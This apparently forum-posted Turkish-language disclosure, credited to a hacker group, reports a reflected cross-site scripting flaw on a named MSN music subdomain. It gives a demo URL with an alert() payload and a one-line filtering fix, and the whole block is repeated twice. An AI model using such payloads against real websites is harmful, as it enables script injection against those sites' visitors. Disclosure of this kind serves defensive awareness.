endLesS
Webmaster
#############################################################
MSN.com XSS Vulnerability
#############################################################
# Author : SOLVER ~ LOJISTIK GRUP
# Name : MSN Music Download Subdomain
# Bug Type : XSS (Cross Site Scripting)
# Infection : Hedef sistem uzerinde zararli Javascript kodlari calistirilabilir.
# Explanation : muziek.downloaden.nl.msn.com sitesi uzerinde bulunan arama motorunda zararli kodlar calistirmaya yarayan bir bugdur.
# Example Exploit : >>alert(/solver/)
[+] Site: muziek.downloaden.nl.msn.com
[+] Demo: http://muziek.downloaden.nl.msn.com/artist.php?artist=>>alert(/solver/)
[+] Proof:
# Bug Fix Advice : Zararli Karakterler Daha Iyi Filtrenmelidir.
#############################################################
MSN.com XSS Vulnerability
#############################################################
# Author : SOLVER ~ LOJISTIK GRUP
# Name : MSN Music Download Subdomain
# Bug Type : XSS (Cross Site Scripting)
# Infection : Hedef sistem uzerinde zararli Javascript kodlari calistirilabilir.
# Explanation : muziek.downloaden.nl.msn.com sitesi uzerinde bulunan arama motorunda zararli kodlar calistirmaya yarayan bir bugdur.
# Example Exploit : >>alert(/solver/)
[+] Site: muziek.downloaden.nl.msn.com
[+] Demo: http://muziek.downloaden.nl.msn.com/artist.php?artist=>>alert(/solver/)
[+] Proof:
# Bug Fix Advice : Zararli Karakterler Daha Iyi Filtrenmelidir.
#############################################################